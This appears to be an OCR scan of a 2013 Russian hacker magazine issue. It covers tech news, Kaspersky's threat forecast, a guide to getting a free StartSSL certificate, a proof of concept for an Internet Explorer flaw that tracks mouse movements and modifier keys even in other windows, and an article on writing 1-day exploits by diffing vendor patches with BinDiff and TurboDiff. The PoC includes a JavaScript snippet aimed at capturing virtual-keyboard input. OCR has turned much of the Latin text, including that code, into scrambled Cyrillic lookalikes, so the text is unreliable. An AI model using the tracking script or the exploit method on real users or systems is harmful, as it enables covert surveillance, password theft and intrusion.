


П ики даже развлекаются нетак, как«обычныелюди»,— 

этолишний раздоказал американский программист Дариус 
Каземи. Так как он оченьлюбит получать подарки, а поку- 
пать их самому себе — значит лишиться злемента сюрприза, Каземи 
решил автоматизировать этот процесс (на самом деле, изначально 
он пытался создать программу, которая выбирала бы потенциально 
нужные товары, но это показалось Каземи скучным). Он создал са- 
мописный скрипт, назвал его Атаіоп Рапсіопп$Ьоррег и приступил 
к самому приятному — тестированию. 

Под прицел креативного программиста попал, какуже можно 
было догадаться из названия, Атагоп. Ботработаеточень просто: 
берет случайное слово из ѴѴогсіпікАРІ и ищет на Аппагоп товары 
по этому ключевому слову. Основываясь на заложенном в него бюд- 
жете (скажем, 30 долларов), программа случайно выбираеттовар, 
будьто книга, СО или ОѴО, в названии которого присутствуетслово, 
составляетсписок подходящих по ценетоваров и покупаетпервый 
лот в этом списке. Если после первой покупки остались средства, 
программа продолжает дотех пор, покабюджетнебудетисчерпан. 

В каком-то смысле этотскрипт — настоящая находка, потому 
что в наши дни сложно получить в Сети по-настоящему случайные 
рекомендации, безучета истории покупок, посещенных сайтов, 
интересов друзей итак далее. 




ПРОГНОЗ ОТ «ЛАБОРАТОРИИ 
КАСПЕРСКОГО» 

КИБЕРУГРОЗЫ ТЕКУЩЕГО ГОДА 

О од назад «Лаборатория Касперского» предсказала прак- 
тически все важные инциденты в области ІТ-безопасности, 
случившиеся в минувшем 2012 году. Специально для этих 
целей компания ежегодно выпускает отчет КазрегзкуБесигіІу 
ВиІІеІіп. Неожиданностью в прошлый раз для экспертов Л К стали 
разве что массовые утечки паролей веб-сервисов, а также атаки 
на 051-модемы и взломы аппаратных средств. 

Аналогичный отчет«Лаборатория Касперского» обнародовала 
итеперь. Компания выделилаодиннадцатьглавныхтенденций, ко- 
торые проявили себя в ушедшем году и теперь могут стать главными 
проблемами в текущем 2013-м. Список получился такой: 

• Целевыеатаки и кибершпионаж. 

• Хактивисты. 

• Кибератаки, финансируемые государствами. 

• Средства слежения на службе правоохранительных органов. 

• Атаки через облачные сервисы. 

• Утечкиличныхданных. 

• Подделки цифровых сертификатов. 

• Кибервымогательство. 

• (Иалварьдля МасОБ. 

• Мобильныезловреды. 

• Уязвимости и эксплойты. 

Пожалуй, самая жуткая часть отчета связана с кибероружием 
и атаками, финансируемыми государством. Эксперты лаборатории 
пишут: «Вероятно, что довольно скоро к подобным кибератакам 
будут прибегать страны, не имеющие статуса национальных госу- 
дарств. При этом косвенный ущерб может быть нанесен объектам, 
на которые атака не была направлена изначально. Жертвами таких 
атак могутстать центры управления энергетическими и транспорт- 
ными системами, финансовые и телекоммуникационные системы, 
атакже другие критически важные объекты инфраструктуры». 




ИЗВЕСТНЫЙ ИБ-СПЕЦИА- 
ЛИСТ БРАЙАН КРЕБС НАШЕЛ 
НОВУЮ РАЗНОВИДНОСТЬ 
СКИММЕРОВ: фейковые 
Р05-терминалы эмулиру- 
ютсеанс связи с банком, 
верификациютранзакции 
и даже печатают чеки. Все 
это без подключения к сети, 
конечно же. Как выяснил 
Кребс, такая игрушка (копия 
настоящего терминала) стоит 
около 2500-2900 долларов 
на черном сетевом рынке. 




61% ПАТЕНТНЫХ ИСКОВ 
В США В ПРОШЛОМ ГОДУ 

подали патентныетролли, 
которые незанимаются раз- 
работками и производством, 
но скупают патенты и судятся 
со всеми. 




В ІЕ С 6-й ПО 10-ю ВЕРСИИ 
НАШЛИ БАГ— браузер отсле- 
живает все движения мыши 
и нажатия <5ЫП>, <С(г1> 
и <ди>. Интересно, что в М5 
исправлять уязвимость не на- 
мерены. 
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НАКОНЕЦ-ТО ВЫШЕЛ ЕНЫбНТЕННЕНТ 0.17, который «пилили» двенадцать лет. Надеемся, следующей версии не придется ждать столько же :). 




Каркас с манипуляторами оказался не неотъемлемой частью Рагег Есіде, как предполагалось ранее. В стандартной 
комплектации его нет вовсе (можно докупить отдельно за 250 долларов). Также пользователям предлагается на выбор 
две док-станции: с клавиатурой и встроенным дополнительным аккумулятором или же с дополнительными тремя 
портами 115В 2.0, НОМІ и разъемами для наушников и микрофона. Вторая док-станция превратитпланшетв полноценную 
домашнюю приставку. 



ТЕ6РА4 
И НЕОБЫЧНЫЕ 
КОНСОЛИ 

НОВАЯ ПЛАТФОРМА ОТ МѴІОІ А И НЕ ТОЛ ЬКО 

ерединазимы — время «железных» 
новостей, крупных выставок и, как пра- 
вило, громких анонсов. Текущий год 
не стал исключением. 

В преддверии открытия ежегодной вы- 
ставки СЕ5 2013 компания МѴІОІА официально 
представила свою новую однокристальную 
платформуТедга 4. В основе новой платфор- 
мы лежит четырехъядерный процессор АРМ 
Сог1ех-А1 5, а дополнительное пятое ядро по- 
прежнему используется для энергосбережения 
при выполнении нетребовательных задач. Чис- 
ло ядер графической составляющей системы 
возросло до 72 (напомню, чтоуТедга 3 их было 
12). До официального анонса ходило множество 
слухов и домыслов относительно поддержки 
ІТЕ, и теперь стало известно, что поддержка 
обеспечиваться все же будет, но опционально. 

Ноесли представлениеТедга4нидля кого 
сюрпризом не стало, то анонс портативной 
консоли отМѴІОІАудивил многих. Замечу, 
что компания представила не прототип, 
а готовое устройство на своем новом чипе; 
новинка получила имя Рго]ес1 5НІЕЮ. Консоль 
выполнена в довольно необычном форм- 
факторе — по сути, это весьма крупный геймпад 
с 5-дюймовым сенсорным экраном. Работает 
новинка под управлением ОС АпЬгоісі 4.2 с пред- 




установленным специальным сервисом ЗЬіеІсІ, 
который обеспечивает доступ к Тедга 2опе. 
Разрешение экрана равно 720р. Аккумулятор, 
обладающий емкостью 38 Вт • ч, должен обе- 
спечиватьдо 24часов просмотра видео и 5-10 
часов игрового процесса, и это определенно не- 
плохой показатель. Рго]ес1 5НІЕЮ оснащается 
парой стереодинамиков, портами 05В, тіпі- 
НОМІ, разъемом для подключения наушников 
и слотом для тісгоВО. Также девайс оборудован 
ѴѴі-Рі 802.11п2х2 МІМО. Весьма неплохие харак- 
теристики для портативной консоли, верно? 

Но это еще не все. Новинка поддерживаеттех- 
нологию МѴЮІА Ѵ6Х, а значит, если утебя есть 
ПК с видеокартой поколения Кер1ег(тоестьЭТХ 
650 и старше), консоль может воспроизводить 
просчитанный на ПК контент, передаваемый 
по беспроводному каналу. По сходному принци- 
пу работаютсервисы ОпЫѵе и баікаі. Этотакже 
означает, что изображение с консоли можно 
легко вывести нателевизор. Кстати, говоря 
отелевизорах, нельзя не отметить, что здесь 



реализована поддержка самых современных 
ТВ с разрешением вплотьдо нового ІІІІга НО 
(3840 X 2160), которое в быту пока практически 
не встречается. МѴІОІАсообщает, что Рго]ес1 
5НІЕЮ поступите продажу во втором квартале, 
но пока не сообщает ничего о цене. 

Пока МѴІОІАтолько готовит свою консоль 
к выходу, еще один очень необычный игровой 
девайс представила компания Раіег. Игровой 
планшет, ранее известный как Рго]ес1 Ріопа, 
был официально представлен и выпущен под 
именем РагегЕсІде.Характеристикиустройства 
вызовут слюноотделение не только у геймеров: 
1Р5-экран с диагональю 10" (1366 х 768 точек), 
процессор 1п(е1 Соге ібтретьего поколения (два 
ядра по 1,7 ГГц), 4 Гб оперативки, видеокарта 
МѴІОІА беРогсе бТ 640М ЕЕ (2 Гб ООРЗ) и 550 
объёмом 64 Гб. И это базовая комплектация! 

А ведь еще есть 115В 3.0, фронтальная камера, 
адаптеры ѴѴі-Рі и ВІиеІооІЬ 4.0. Устройство ра- 
ботает под управлением ѴѴіпсІоѵѵз 8. Стоимость 
базовой комплектации — 1000 долларов. 




НЕ МОЖЕМ НЕ ПОРАДОВАТЬСЯ УСПЕХАМ ЗНАМЕНИТОЙ МАЛЮТКИ: 



ПРОДАЖИ РА5РВЕКЯѴ РІ ДОСТИГЛИ 
одного МИЛЛИОНА ШТУК, СООБЩИЛ 
ОСНОВАТЕЛЬ РА5РВЕНЛУ РІ РОЦНОАТІОН 
ЭБЕН АПТОН 
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НЕАОЕК 




КОЛОНКА 
СТЁПЫ ИЛЬИНА 



ПРО бесплатный 

551-СЕРТИФИКАТ 



в конце прошлого года многие пользователи 
бтаіі неожиданно столкнулись с проблемой: 
при сборе почты со сторонних сервисов (по про- 
токолам ІМАР или РОРЗ) обязательным требо- 
ванием стало использование «Бігісі» 551. Если 
у почтового сервера был самоподписанный 551- 
сертификат, то соединение с ним не могло быть 
установлено. Напомню, что 551-сертификаты 
выдаются центрами сертификации, чьи кор- 
невые сертификаты, в свою очередь, хранятся 
в специальном хранилище браузера и другого 
ПО. Таким образом, браузер может проверить, 
что сертификат, с помощью которого под- 
тверждается подлинность сайта, действитель- 
но выдан одним из центров сертификации. 
Вопреки бытующему мнению о запредельной 
стоимости сертификата, приобрести его можно 
всего за 2-3 тысячи рублей. Но что интереснее, 
получить валидный 551-сертификат для своего 
сервера можно совершенно бесплатно. Хочу 
поделиться с тобой таким опытом. 





ЗіагіЗЗиРгее 


ЗіагіЗЗи іаепіііу ѴегіЛесі 


5/МІМЕСІіеп«— АиіЬ 


/ 


V 


551Л из для веб-сервера 




/ 


5$1/Ти$дляХМРР 




/ 


128/256-6итноешифрование 




/ 


С возможностью продления 


/ 


/ 


Обнаружение уязвимостей 


/ 




Поддержка нескольких 
доменов іиСбІ 


X 




Поддержка нескольких 
почтовых адресов 19/МІМЕІ 


X 




Поддержка запросов 
с метасимволами 


X 


/ 


Клиент-серверная 

авторизация 


X 


/ 


ОЬ)ес(Со(1е8ідпіпд 


X 


/ 


Отметки времени 


X 


X 


Класс верификации 


Класс 1 


Класс 2 


Ограничения сертификата 


Отсутствуют 


Отсутствуют 


Срокдействиясертификата 


ІГОД 


2 года 



Список опций сертификата, которые можно получить 
бесплатно и за 59,90$ 



[знакомьтесь, 5ТАКТ5511] 

Один из сервисов, предоставляющих бесплат- 
ный 551-сертификат на один год, — 5іагі551 
( 5ІагІ55І.сот 1. Его бизнес-модель построена 
интересным образом: каждому желающему 
предоставляется бесплатный сертификат 
для домена, нужно лишь подтвердить владе- 
ние доменом (с помощью е-таіі-сообщения). 

Но если тебе нужно больше опций, например 
ѵѵіісісагсі-сертификат, с помощью которого 
можно подписать поддомены домена (*.с1отаіп. 
сот), требуется подтвердить свою личность — 
и вот за это 5іагі551 берет деньги. Получается, 
что если тебе нужен самый простой серти- 
фикат, то платить не нужно вообще. Един- 
ственный момент — через год его придется 
сгенерировать заново. 

КАК ПОЛУЧИТЬ СЕРТИФИКАТ 

процесс генерации сертификата прост и неза- 
тейлив. 

1. Первым делом всервисенужнозаре- 
гистрироваться, заполнив небольшую 
форму. Важноуказатьимя, телефон, атакже 
е-таіі-адрес, на который вскоре придет 
код подтверждения. Запросы модериру- 
ются, поэтому левые данные, скорее всего, 
не пройдут. 

2. Подтвердив е-таіі, переходим кследующе- 
му шагу— выбору размера ключа (2048 или 
1024). 

3. Сервис генерирует приватный ключ и серти- 
фикат, который нужноустановить в браузер. 
Для этого кликаем на «)п5ІаІІ» — и браузер 
все сделает сам, выдав сообщение отом, 
что сертификат был успешно сохранен (кста- 
ти, его рекомендуется сохранить на отдель- 
ном носителе). 

4. Далее необходимо подтвердить факт 
владения доменом, для котороготы хочешь 
получить сертификат. Для этого переходим 
в «Ѵаіісіаііоп ѴѴІ 2 аг(і» и выбираем пункт 
Оотаіп МатеѴаІісІаІіоп. Для завершения 



процедуры необходимо иметь возможность 
получить письмо на один изтрех емейлов 
(розІтазІегО, Ьозітазіегга, ѵѵеЬтазІегО) 
или почты из ѵѵЬоіз нужного домена. После 
этого домен подтвержден. 

5. Теперь, когда сервис знает, что мы действи- 
тельно владеем доменом, можно непосред- 
ственно сгенерировать сертификат. Вся 
процедура осуществляется через мастер 
СегІі^ісаІезѴѴігагсІ. При этом доступна воз- 
можность сгенерировать разные типы сер- 
тификатов, но нам прежде всего интересны 
два варианта: 

• сертификат для веб-сервера; 

• ХМРР-(ЗаЬЬег) сертификат. 

6. Вводим пароль для ключа, атакже его 
размер ключа — после чего получаем 

и сохраняем ключ. После этого 5іагі551 
отобразит домены, владение которыми 
ты ранее подтвердил, — нужно выбрать один 
из них. При этом сервис предлагаетуказать 
поддомен, для которого нужно выписать 
сертификат (например, ѵѵѵѵѵѵ. или таіі). 

После завершения работы мастера нужно 
немного подождать. Через некоторое время 
от5іагі551 придет письмо с подтверждени- 
ем генерации сертификата. 

7. Остается самая малость. Загрузить сер- 
тификат (ТооІ Вох Реігіеѵе СегІіПсаІе) 

и подключить его к серверу, воспользовав- 
шись инструкциями, которые заботливо 
выложены на сайте 5іагі551. 

[ПЛАТНЫЕ возможности] 

Сайт, подтвержденный 551-сертификатом, 
априори вызывает больше доверия у поль- 
зователей. Особенно если юзеру необходимо 
указывать какие-то данные о себе или про- 
водить онлайн-платежи. К слову, 5іагі551 
интересен не только бесплатными сертифи- 
катами, но и очень гуманными ценами. За 59 
долларов 90 центов можно получить ѵѵіМсагсІ- 
сертификат на два года! I 
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Анатолий Ализар (аІІ2аг0дтаіІ.сот) 
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РгооІ'-оІ'-СопсерІ: 

ОТСЛЕЖИВАЕМ КУРСОР 
С ПОМОЩЬЮ ІМТЕРМЕТ ЕХРЮКЕВ 



ЧТО это ТАКОЕ? 

в Іпіегпеі Ехріогег обнаружена то ли уяз- 
вимость, то ли функция, которая позволяет 
отслеживать движения мыши на экране и 
нажатия клавиш <5ЫЙ>, <СігІ> и <АІІ>, даже 
если окно браузера свернуто. Баг присутствует 
во всех версиях ІЕ с 6-й по 10-ю. Достаточно 
запустить эксплоит в одном фрейме, и после 
этого мы можем отслеживать действия мыши 
в \^іп(іоѵѵ5, в том числе в других окнах ІЕ, в ок- 
нах других браузеров, на рабочем столе или 
сторонних приложениях. 

Через эту уязвимость злоумышленни- 
ки могут получить информацию о паролях 
пользователя, которые тот вводит с вирту- 
альной клавиатуры. Сама компания МісгозоЙ 
рекомендует использование виртуальных 
клавиатур. Они применяются для повышения 
безопасности, чтобы скрыть от кейлоггеров 
вводимые пароли, номера пластиковых карт 
или другую платежную информацию. Вир- 
туальные клавиатуры часто используются 
на сайтах онлайн-банкинга для защиты. 

По иронии, многие такие банковские при- 
ложения работают только в браузере Іпіегпеі 




Демонстрация эксплойта, отслеживание курсора 
в виртуальном окне ІЕ и за его пределами 



Ехріогег. Даже когда жертва заходит на стра- 
ницу онлайн-банкинга с помощью другого 
браузера (например, СЬгоппе), злоумышленник 
может получить информацию о нажатиях 
на виртуальную клавиатуру, если эксплоит за- 
пущен в минимизированном окне ІЕ. 

Получается, что браузер ІЕ полностью 
дискредитирует защиту с помощью виртуаль- 
ных клавиатур. Учитывая новую уязвимость, 
использование виртуальной клавиатуры 
в Іпіегпеі Ехріогег можно считать более опас- 
ным, чем ввод пароля с обычной клавиатуры. 

Специалисты по безопасности из Місгозо^І 
Бесигііу РезеагсЬ Сепіег уведомлены об этой 
уязвимости еще в октябре. По мнению Місгозо^І, 
опасность ее преувеличена. Она является 
«теоретической», и подобная атака «трудно 
реализуема на практике». Якобы у злоумыш- 
ленника нет возможности узнать, что изображе- 
но на кнопках клавиатуры, которые нажимает 
жертва. См. официальный ответ вице-прези- 
дента МісгозоП, руководителя по разработке 
Іпіегпеі Ехріогег: Ьіиу/ІІоѴ025 . Можно предпо- 
ложить, что МІСГ050Й не намерена исправлять 
эту уязвимость в ближайшее время. 

При этом уже известны как минимум два 
случая, когда эта «особенность» браузера 
ІЕ использовалась для слежки за пользо- 
вателями через рекламные баннеры в сетях 
с несколькими миллиардами баннеропоказов 
в месяц. 

КАК ЭТО РАБОТАЕТ? 

Уязвимость связана с моделью обработки 
объектов событий в браузере Іпіегпеі Ехріогег. 
Этот браузер предоставляет подробную 
информацию о каждом произошедшем со- 
бытии в виде свойств объекта Еѵепі, при этом 
браузер всегда делает объект Еѵепі доступным 
в функции-обработчике как глобальный объ- 
ект, даже если этого и не требуется. 

Таким образом, можно написать скрипт, 
который с помощью объекта ЯгеЕѵепіО будет 
опрашивать браузер о событиях через опреде- 
ленные интервалы времени. Мы можем полу- 
чить следующие свойства Еѵепі: 

• аІЖеу — состояние клавиши<АІІ>(ігие, если 

клавиша нажата, (аіве, если не нажата); 



• аКІеЙ — состояние левой клавиши <АК>; 

• сІіеп(Х, сІІепІѴ — горизонтальная (х) и верти- 
кальная (у) координаты мыши относительно 
просматриваемой области документа; 

• сІгІКеу — состояние клавиши <СігІ>; 

• с»г11е!1— состояние левой клавиши<СігІ>; 

• оНзеІХ, оНзеіѴ — левая и верхняя коорди- 
наты указателя относительно содержащего 
контейнера; 

• всгеепХ, зсгеепѴ — горизонтальная и верти- 
кальная координаты точки, где расположен 
курсор на экране, без связи с окном браузера, 
левая верхняяточка экрана имееткоордина- 
ты (0, 0); 

• зЫНКеу — состояние клавиши <5Ы^1>; 

• зЫ^ІІеЙ — состояние левой клавиши <5Ы11>; 

• хиу — горизонтальная и вертикальная коор- 
динаты указателя относительно родитель- 
ского элемента. 

7бдТР 00 р" о Р-То N с Е РТ 

<ИТт1> 

<Иеас1> 

<5сгір1: •Суре=’Чех1:/заѵа5Сгір'С"> 
міпсІом.а1:1:асІіЕѵеп1:("оп1оасІ‘', 
-РипсТіопО { 

ѵаг сіеіесіог = сіоситепі:.*-' 
ее'СЕ1етепТВуІсІ( "сІе1:ес1:ог" ) ; 
сІеТес-Сог . аТТасИЕѵепТ^ 

( " опшои 5етоѵе " , 

•Рипсіііоп (е) { 

сІеТесІіог.іппегНТМІ = е.5СгеепХ +— 
", " + е.зсгеепѴ; 

}); 

5е1Іп1:егѵа1(-Рипс1;іоп () { 
сІе'Сес'Сог . бгеЕѵепІ: ( "оптоизешоѵе" ) ; 
}, 100 ); 

}); 

</5СГІр-1:> 

</ИеасІ> 

<ЬосІу> 

<с1іѵ ісІ="сІе-1:ес1:ог"> 

</сІіѵ> 

</ЬосІу> 

</ІтІ:т1> 

Демонстрацию эксплойта можно посмо- 
треть здесь: іесіаіаіеак.врісіег.іо/сіеппо . □□ 
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Дмитрий «Оіді» Евдокимов, ОІдКаІ 5есигі(у |0еѵ(іокітоѵ(І5І 
Никита Тараканов ІШМТагакапоѵ) 



С0ѴЕК5Т0КУ 



Вся информация предоставлена исключи- 
тельно в ознакомительных целях. 

Ни редакция, ни автор не несут ответствен- 
ности за любой возможный вред, причинен- 
ный материалами данной статьи. 



ХАКЕР 02/169/2013 







1-сІау сплоиты 



КАК АНАЛИЗ ПАТЧА 
ИСПОЛЬЗУЕТСЯ ДЛЯ 
БЫСТРОГО НАПИСАНИЯ 
СПЛОИТОВ 



Чтобы найти уязвимость и создать боевой 
эксплойт, необязательно прибегать 
к фаззингу или с головой погружаться 
в дизассемблированный код. Иногда достаточно 
патча, который ее же исправляет! 



(«(«вав'Ъ к «. 



Ч Ч 4в*, ❖ ѳ «*.4.вю. ^ Ч>: ч ч Л. * 0 




Интерфейс ВіпОі(! 



ПОГРУЖЕНИЕ В ТЕМУ 



в информационной безопасности, как и везде, 
бывает так, что одно и то же решение может 
быть использовано как во благо, так и во вред, 
как для защиты, так и для нападения. Обычный 
патч, закрывающий критическую уязвимость, 
в одних руках становится средством защиты, 
а в других — отправной точкой для атаки. Да- 
да, как ни странно это прозвучит, но, скачивая 
очередную заплатку, закрывающую критическую 
уязвимость винды, ты фактически получаешь 
все, что необходимо для написания своего 1-сіау 
эксплойта («1-гіау» называют эксплойты, ис- 
пользующие известную уязвимость, для которой 
уже существует патч). Так как не все пользо- 
ватели регулярно обновляют свои системы, 
опасность 1-сІау ничуть не меньше, чем 0-(іау. 
Единственное, что остается сделать, — проана- 
лизировать изменения, внесенные производите- 
лем, и выяснить, где притаилась уязвимость. 

Все патчи можно условно разделить на два 
типа: 

• распространяемые в виде списка различий 
между двумя версиями файла или набора 
файлов; 

• распространяемые в виде двоичныхфайлов, 
которые содержат в себе исправленные вер- 
сии уязвимых файлов и, по существу, просто 
заменяющие собой уязвимый файл. 

Как ты уже понял, создание любого 1 -сІау на- 
чинается со сравнения уязвимой версии файла 
с исправленной. Анализ патчей, распространяе- 
мых в виде списка различий, сводится к запуску 
сіі^!, Мо1ерас)++ с дополнением Сотраге или 
ѴѴіпМегде и так далее. Задача эта несложная, 
поэтому рассматривать ее мы не будем, а зай- 
мемся лучше патчами, распространяемыми 
в виде двоичных файлов. Рассмотрим, как про- 
исходит поиск уязвимости, какие инструменты 
для этого применяются и как перейти от найден- 
ной уязвимости к РоС-эксплойту. 



ПОИСКУЯЗВИМОСТЕЙ 



процесс поиска уязвимости начинается с выбора 
цели и сбора информации о ней. Причем чем 



больше информации ты соберешь, тем лучше. 

В дальнейшем это может значительно сократить 
время идентификации «дырявой» функции и раз- 
работки эксплойта. Чтобы сузить круг поисков, по- 
лезно будет посетить сайт разработчика ПО и че- 
ловека/компании, обнаружившего уязвимость, 
а также такие ресурсы, как СѴЕ и БесигіІуРосиз. 
Можно посетить еще сайт 201 , там выкладывают- 
ся очень хорошие описания уязвимоаей. 

После того как со сбором информации за- 
кончено, необходимо обзавестись уязвимой вер- 
сией файла и пропатченной. На этом этапе могут 
возникнуть небольшие трудности, так как не- 
которые вендоры распространяют свои патчи 
только между своими лицензионными клиента- 
ми. Допустим, что нам повезло и искомые файлы 
у нас в руках. Что дальше? А дальше начинается 
анализ этих файлов, целью которого является 
локализовать уязвимость. 

В процессе сравнения двух файлов мы дви- 
жемся от более крупной сущности (библиотеки) 
к более мелкой (базовому блоку). Базовый блок 
(или сокращенно ББ) — это последовательность 
инструкций, которая имеет один вход и один 
выход, то есть если управление передается 
на начало ББ, то выполнятся все инструкции, 
входящие в данный ББ. Единственное, что стоит 
тут отметить, — инструкции вызова процедур 
(саІІ) принадлежат тому же ББ, что и преды- 
дущие инструкции, а не образуют новый ББ. 

В общем, кто хоть раз открывал ЮА Рго — знает, 
о чем идет речь. Уже на данном этапе начина- 
ются серьезные трудности. Придется запастись 
терпением, так как не каждое отличие в фай- 
лах будет в итоге исправлением уязвимости. 

Оно может оказаться следствием обновления 
функционала, оптимизации кода, рефакто- 
ринга, изменения настроек компилятора или 
смены компилятора. При проверке достаточно 
большой библиотеки или исполняемого файла 
можно потерять кучу времени и нервов, поэтому 
при анализе в первую очередь стоит обращать 
внимание на появление в пропатченном бинар- 
нике следующих признаков: 

• вызов безопасной функции манипуляции 

над строками; 



• вызов функции подсчета длины; 

• отсутствие небезопасной функции; 

• вставка инструкций СМР; 

• добавлениефункций преобразования вида 
5іг2іпі; 

• добавление/удаление функций, отве- 
чающих за преобразование строк (типа 
МиШВуІеТоѴѴісіеСЬаг); 

• поиск_и5ег5еІІа5іЕггог() и извлечение 
изнееполезной информации. 

Общий алгоритм поиска 1-с1ау уязвимостей 

1. Выборцели исбор информациионей 

2 . Скачивание патча и получение непатченно- 
го файла 

3 . Сравнениедвухбинарныхфайлов 

• Поискуязвимогобинарника 

• Поискуязвимой функции 

• Поиск уязвимого базового блокав функ- 
ции 

• Анализ природы уязвимости 

4 . Создание РоС 

5 . Написаниеэксплойта 



АРСЕНАЛ ДЛЯ ОПЕРАЦИИ 1-РАУ 



Такую сложную задачу, как создание соб- 
ственного 1-(іау эксплойта, без специальных 
инструментов решить не получится. Поэтому 
предлагаю познакомиться с доступным на сегод- 
няшний день арсеналом программ, способных 
нам помочь. В нем присутствуют как хорошо 
известные многопрофильные программы, так 
и очень специализированные. Из общеизвест- 
ных можно отметить следующие: виртуальные 
машины ѴМѵѵаге, ѴігІиаІВох, набор программ 
от Бузіпіегпаів, набор программ для создания 
и сравнения снимков системы — АзЬатроо 
и его аналоги. А на специализированных инстру- 
ментах, задача которых — непосредственная 
работа с патчами, сравнение двух бинарных 
файлов и определение, где и в чем они отлича- 
ются, мы остановимся подробней. 

Наибольшую ценность для нас представляют 
программы, умеющие сравнивать исполняемые 
файлы. Почти все они работают по следующей 
схеме: берут два бинарных исполняемых файла. 
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разбирают их, находят в них функции и пытают- 
ся сопоставить функции из первого файла функ- 
циям во втором. В итоге на выходе получаются 
три группы функций: функции, присутствующие 
в обоих файлах; функции, присутствующие 
только в первом файле; функции, присутствую- 
щие только во втором файле. Но как же эти про- 
граммы определяют, что две функции в разных 
файлах являются одним и тем же, даже с учетом 
того, что одна из функций в процессе обновле- 
ния могла измениться? Для этого существует 
достаточно большая группа признаков: сходство 
хешей от кода функций, сходство хешей от имен 
функций, на основе графа передачи управления, 
на основе графа вызовов, последовательности 
адресов, на основе ссылок к строкам, на осно- 
ве сигнатур. Все эти признаки используются 
в самых ярких представителях данного класса 
программ, с которыми мы сейчас познакомимся 
поближе. 




Один из популярнейших инструментов для сравнения файлов — РакИОіМ2 



ВІНОІРР 

Первым в нашем списке идет ВіпОі^! І ѵѵѵѵѵѵ. 
гупаппісз.сот/ЬіпсІіП.ЫтІ І — инструмент, вы- 
пущенный небезызвестной компанией 2упатіс5, 
которую в марте этого года купила боодіе. Это 
единственный платный (но доставаемый ;)) 
представитель в сегодняшнем обзоре. После по- 
купки компании боодіе цена на ВіпОіИ уменьши- 
лась с 900 до 200 долларов, правда, софт теперь 
стал доступен только для клиентов из Америки. 

Данный инструмент написан на Эаѵа и пред- 
ставляет собой ріидіп для ЮА Рго, который 
можно запускать как из Иды, так и отдельно 
от нее. В случае отдельного запуска необходимо 
указать два ібЬ-файла для сравнения. В резуль- 
тате работы ВіпОі^І проанализирует функции 
и разделит их на три категории (упомянутые 
выше), подсветит базовые блоки функций 
разными цветами. Зеленые блоки означают, 
что в обеих версиях файла существуют базовые 
блоки с идентичными мнемониками инструк- 
ций, но при этом операнды в инструкциях могут 
отличаться. Красный цвет означает, что соответ- 
ствующий ББ отсутствует в другом файле. И на- 
конец, желтый цвет говорит о том, что найден 
эквивалентный ББ, но в нем изменены какие-то 
инструкции. Изданной градации соответствия 
можно сделать вывод, что ВіпОіИ основы- 
вает свой анализ эквивалентности функций 
только на ББ, ветвях и мнемониках инструкций. 
Для определения эквивалентности функций 
используется около 13 подходов, а для опреде- 
ления эквивалентности ББ 14 подходов. Хочется 
отметить, что это единственный инструмент, 
который осилил сравнить файлы размером 9 Мб 
с 10 031 функцией на борту, на что у него ушло 15 
минут (если кому интересно, то это были файлы 
ядра 5АР-системы). 

ТУРВООІРР 

ТигЬо(1і^( ( ЬіЦѵ/1АР5Іт 1 так же, как и Віп^і^^ 
представляет собой плагин для замечательного 
дизассемблера ЮА Рго. Как можно заметить, все 
программы данного класса имеют очень схожий 
интерфейс: экран, разделенный пополам, где 
слева представление одного бинарного файла. 




Результат работы ТигЬоОіИ 



а справа другого и цветом выделены отличия 
между ними. Однако парни из СогеЗесигіІу поду- 
мали и решили, что это абсолютно не догма, да 
и вообще не всегда удобно, и сделали Аигеііах 
(ЬШу/ЦкУдуР І — расширение для ТигЬосІіН, 
которое показывает все отличия между 
бинарными файлами на одном графе. При ис- 
пользовании чистого ТигЬосіі(( (без надстройки 
Аигеііах) белым цветом отображаются базовые 
блоки, имеющие одинаковую контрольную сумму 
и число инструкций, зеленым — имеющие оди- 
наковое число инструкций, желтым — разное 
число инструкций, красным — отсутствующие 
в одном из файлов. При использовании Аигеііах 
все различия отображаются на едином графе. 
Инструкции внутри каждого ББ могут подсвечи- 
ваться следующими цветами: красным (в новом 
файле данная инструкция отсутствует (удалена)), 
зеленым (в новом файле добавлена данная ин- 
струкция) и серым (те инструкции, что остались 
без изменения). 

ТигЬосІі^! имеет несколько интересных осо- 
бенностей, о которых нельзя не сказать. К при- 
меру, ведение своей собственной базы данных 



для хранения информации из ісіЬ-файла. Что еще 
можно отнести к его сильным сторонам? Во- 
первых, его код полностью открыт. Во-вторых, 
он использует свое представление ББ, функции, 
списков (чтобы узнать какое — загляни в файлы 
ІигЬосіі^І.срр, ІІБІ.срр). В-третьих, использует соб- 
ственный алгоритм «потерянных» функций. Эта 
функциональность иногда очень сильно помога- 
ет в локализации уязвимости. Пример из жизни: 
ЮА проанализировала огромный объем свежего 
кода АсіоЬе РІазЬ РІауег и определила 100500 
функций. Однако на самом деле ЮА не смогла 
определить функцию(ии) по некоторым адресам. 
А зесигііуііх как раз исправлял код в этой самой 
«неопределенной» функции. Соответственно, 
ты никогда не увидишь, что изменяет патч, 
так как этой функции как бы нету. Вот в таких 
случаях ТигЬосіі^! просто выручает! Ну и конечно, 
как и у любого инструмента, у него есть свои 
минусы. Первый и основной — плагин работа- 
ет только на ЮА 5.x, а на 6-й линейке падает 
и останавливает процесс «диффинга». Еще одно, 
за что его можно упрекнуть, — это скорость ра- 
боты. Из-за того что используется своя файловая 
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ПОДРОБНЕЕ 
О М5-РАТСН-Т0015 

М5-раІсЬ-ІооІ5 — это набор из двух 
инструментов, предназначенных для 
анализа бюллетеней от М5 и извлечения 
из них полезной информации. Первый 
инструмент — тзих — помогает достать 
бинарный файл/патч из файлов тви- 
формата, который используется в Ѵівіа/ 
\Ѵіп(іоѵѵ57. Второй — твРаІсЫп^о — 
предназначен для создания и поддержки 
БД, содержащей сведения об измене- 
ниях файлов от бюллетеня к бюллетеню. 
Другими словами, помогает отвечать 
на такие вопросы, как «Сколько версий 
твЫтІ.сІІІ для ІЕ9 существует на ХР?», 
или «Я вот хочу перезаписать указатель 
функции в сіаіа-сегменте библиотеки 
о1е32.(111, как часто она изменялась?», 
или «Будет ли хсЬдезр, есх в пісііі.сііі ра- 
ботать для всех патчей на ХР 5Р37». Плюс 
ко всему, товарищ с ником Ьіп]о написал 
для всего этого обертку под незамысло- 
ватым названием тзраІсЬ.ру, которая 
добавляет возможность автоматически 
скачивать заплатки, не тратя время 
на их поиск на сайте МісговоП. 



ПАМЯТКА 
ПО РАСПАКОВКЕ 
М5и/М5Р/М51/ 
ЕХЕ-ФАЙЛОР 

1. Місго5оПНоНіхІп5ІаІІег(ехе) 

веТир.ехе 

С:\ехТгасСес1_б1е5\ /с 

2. МісговоПУрсіаІеБіапсІаІопе 
Раскадеітви) 

